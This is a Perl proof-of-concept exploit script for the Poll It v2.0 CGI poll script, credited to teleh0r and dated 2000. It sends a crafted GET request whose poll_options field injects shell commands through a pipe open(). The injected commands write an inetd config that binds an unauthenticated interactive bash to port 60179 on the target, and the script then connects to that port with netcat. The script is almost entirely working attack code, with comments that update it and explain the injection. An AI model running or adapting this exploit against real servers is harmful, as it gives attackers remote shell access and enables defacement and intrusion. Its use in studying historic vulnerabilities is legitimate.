#!/usr/bin/perl -w

## Poll It v2.0 CGI / Proof of Concept Exploit.
## 
## The flaw in Poll It v2.0 has supposedly been
## used in many of the latest defacements.
##
## Credit to Elias Levy for explaining how the 
## CGI script could be exploited in his post to
## Bugtraq. Thanks to Chris Gunso for tips and 
## testing.
##
## The exploit will bind a shell to port 60179
## (fido) using inetd. That listener is unauthenticated
## and stays up until killed, and /tmp/.hass is left
## behind on the target - noisy, and anyone who can
## reach the port gets the same shell.
##
## Written by teleh0r@doglover.com / anno 2000  

use strict; use Socket;

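# Usage: $0 <target> [http-port] [script-path]
# Only <target> is required; the defaults (port 80, /cgi-bin/poll.cgi)
# reproduce the original hard-coded behaviour.
if (@ARGV < 1) {
    print("Usage: $0 <target> [http-port] [script-path]\n");
    exit(1);
}

my $target    = $ARGV[0];
my $http_port = defined($ARGV[1]) ? $ARGV[1] : 80;
# Installs differ in both the directory and the script name (the
# original printed pollit.pl but requested poll.cgi) - make it an
# argument instead of something to edit in the source.
my $cgi_path  = defined($ARGV[2]) ? $ARGV[2] : '/cgi-bin/poll.cgi';
my $bind_port = 60179;   # port the injected inetd entry listens on

# Sanity-check the arguments before they reach socket calls or the
# nc command line.  inet_aton only handles hostnames / dotted IPv4.
$target    =~ /\A[A-Za-z0-9.-]+\z/  or die("Error: bad target '$target'\n");
$http_port =~ /\A\d{1,5}\z/         or die("Error: bad port '$http_port'\n");
$cgi_path  =~ m{\A/[\w./-]+\z}      or die("Error: bad path '$cgi_path'\n");

print("\nRemote host: $target\n");
print("CGI-script: $cgi_path\n");

my $agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";

# The attack is the query string, written out in the clear (the
# original hid exactly these bytes as \x.. escapes).  Spaces are sent
# as '+'.  The two password fields are set to matching dummy values -
# this appears to be what satisfies the script's admin check, but that
# is not verifiable from here.  poll_options carries the payload and
# the trailing '|' is the key: if the script hands the value to a
# 2-arg open(), it becomes a pipe open and the shell runs
#   echo '60179 stream tcp nowait nobody /bin/bash bash -i' > /tmp/.hass;
#   /usr/sbin/inetd /tmp/.hass
# i.e. a throw-away inetd config binding an interactive bash to
# $bind_port.  That listener is unauthenticated, stays up until
# killed, and leaves /tmp/.hass plus an extra inetd on the target.
my $evilcode =
    "admin_password=hass&entered_password=hass" .
    "&action=add_option&add_option=1" .
    "&poll_options=echo+'$bind_port+stream+tcp+nowait+nobody+/bin/bash+bash+-i'" .
    "+>+/tmp/.hass;/usr/sbin/inetd+/tmp/.hass|";

# HTTP/1.0 request.  Header lines are CRLF-terminated and the header
# block ends with an empty line; the original sent bare LFs and no
# blank line, which only works on servers lenient about framing.
my $crlf   = "\015\012";
my $sploit = join($crlf,
    "GET $cgi_path?$evilcode HTTP/1.0",
    "Connection: close",
    "User-Agent: $agent",
    "Host: $target",
    "Accept-Encoding: gzip",
    "Accept-Language: en",
    "Accept-Charset: iso-8859-1,*,utf-8",
) . $crlf . $crlf;

my $iaddr = inet_aton($target)    or die("Error: cannot resolve $target\n");
my $paddr = sockaddr_in($http_port, $iaddr);
my $proto = getprotobyname('tcp') or die("Error: $!\n");

# Lexical handle so nothing leaks into the global namespace; every
# step is checked because a silent failure here just looks like
# "no shell came back".
socket(my $sock, PF_INET, SOCK_STREAM, $proto) or die("Error: socket: $!\n");
connect($sock, $paddr)                         or die("Error: connect: $!\n");
defined(send($sock, $sploit, 0))               or die("Error: send: $!\n");
close($sock);

print("\nSleeping 5 seconds - waiting for the shell ...\n\n");
sleep(5);
# List-form system(): $target goes straight to nc, never through a
# shell.  nc's exit status is reported rather than silently dropped.
system('nc', '-w', '10', $target, $bind_port) == 0
    or warn("nc exited with status " . ($? >> 8) . "\n");
exit(0);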